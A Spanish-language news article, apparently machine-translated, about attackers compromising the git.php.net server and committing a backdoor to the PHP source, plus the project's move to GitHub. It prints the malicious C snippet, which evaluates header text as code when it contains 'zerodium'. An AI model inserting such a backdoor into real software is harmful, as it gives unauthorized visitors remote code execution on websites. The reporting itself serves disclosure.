Una puerta de dibujos animados conduce a una pared de código de computadora.

Un pirata informático comprometió el servidor que se utilizó para distribuir el lenguaje de programación PHP y agregó una puerta trasera al código fuente que habría dejado a los sitios web vulnerables a una adquisición completa, dijeron miembros del proyecto de código abierto.

Dos actualizaciones enviadas al servidor PHP Git durante el fin de semana agregaron una línea que habría permitido a los visitantes no autorizados ejecutar el código de su elección si lo hubieran ejecutado desde un sitio web basado en PHP. Las confirmaciones maliciosas aquí y aquí le dieron al código la capacidad de inyectar código para los visitantes que tenían la palabra «Zerodium» en un encabezado HTTP.

PHP.net pirateado, código detrás de la puerta

Los compromisos se hicieron con el repositorio php-src bajo los nombres de cuenta de dos conocidos desarrolladores de PHP, Rasmus Lerdorf y Nikita Popov. «Todavía no sabemos exactamente cómo sucedió esto, pero todo apunta a un compromiso en el servidor git.php.net (y no un compromiso en una sola cuenta de Git)», escribió Popov en un comunicado publicado el domingo por la noche.

Después del compromiso, Popov dijo que los mantenedores de PHP han llegado a la conclusión de que su infraestructura Git independiente representa un riesgo de seguridad innecesario. Como resultado, retirarán el servidor git.php.net y convertirán a GitHub en la fuente oficial de repositorios PHP. En el futuro, todos los cambios en el código fuente de PHP se realizarán directamente en GitHub y no en git.php.net.

Los cambios maliciosos se hicieron de conocimiento público a más tardar el domingo por la noche por parte de desarrolladores como Markus Staab, Jake Birchallf y Michael Voříšek al revisar un compromiso asumido el sábado. La actualización, que supuestamente corrige un error tipográfico, se realizó con una cuenta que usaba el nombre de Lerdorf. Poco después del descubrimiento inicial, Voříšek descubrió la segunda confirmación maliciosa, realizada con el nombre de cuenta de Popov. Se ha afirmado que está deshaciendo la corrección de errores tipográficos anterior.

Ambas confirmaciones agregaron las mismas líneas de código:

	
		
			onvert_to_string(enc);
	if (strstr(Z_STRVAL_P(enc), "zerodium")) {
		zend_try {
			zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");

Zerodium es un corredor que compra exploits a investigadores y los vende a agencias gubernamentales para su uso en investigaciones u otros fines. No está claro por qué las confirmaciones se refieren a Zerodium. El director ejecutivo de la empresa, Chaouki Bekrar, dicho en Twitter el lunes que Zerodium no estuvo involucrado.

«Saludos al troll que incluyó ‘Zerodium’ en los compromisos PHP-Git de hoy», escribió. “Por supuesto que no tenemos nada que ver con eso. Probablemente los investigadores que encontraron este error / exploit intentaron venderlo a muchas empresas, pero nadie quería comprar esta porquería, así que lo quemaron por diversión.

Karma negativo

Antes del compromiso, el grupo PHP manejaba todo el acceso de escritura al repositorio en su propio servidor Git http://git.php.net/ usando lo que Popov llamó un sistema «autodesarrollado» llamado Karma. Dependiendo de las publicaciones anteriores, los desarrolladores recibieron diferentes derechos de acceso. GitHub ya era un repositorio espejo.

Ahora, el grupo PHP está renunciando a la infraestructura de Git autohospedada y administrada y la reemplaza con GitHub. El cambio significa que GitHub es ahora el repositorio «canónico». El grupo PHP ya no utilizará el sistema de karma. En cambio, los contribuyentes deben ser parte de la organización PHP en GitHub y usar la autenticación de dos factores para las cuentas que pueden confirmar.

El evento de este fin de semana no es la primera vez que los servidores de php.net han sido violados con la intención de llevar a cabo un ataque a la cadena de suministro. A principios de 2019, el extenso repositorio de aplicaciones y extensiones de PHP cerró temporalmente la mayor parte del sitio web después de que se descubriera que los piratas informáticos habían reemplazado el administrador de paquetes principal por uno malicioso. Los desarrolladores del grupo dijeron que cualquiera que haya descargado el administrador de paquetes en los últimos seis meses debería obtener una copia nueva.

PHP ejecuta aproximadamente el 80 por ciento de los sitios web. No ha habido informes de sitios web que introduzcan cambios maliciosos en sus entornos de producción.

Los cambios probablemente fueron realizados por personas que querían mostrar su acceso no autorizado al servidor PHP Git en lugar de crear sitios web de puerta trasera con sitios que usan PHP, dijo HD Moore, cofundador y CEO de la plataforma de descubrimiento de redes Rumble.

«Parece que los atacantes están controlando Zerodium o tratando de crear la impresión de que el código ha estado detrás de la puerta durante mucho más tiempo», le dijo a Ars. «De cualquier manera, pasaría mucho tiempo revisando las confirmaciones anteriores, si Tendría una garantía real en PHP «.



DEJA UNA RESPUESTA

Por favor ingrese su comentario!
Por favor ingrese su nombre aquí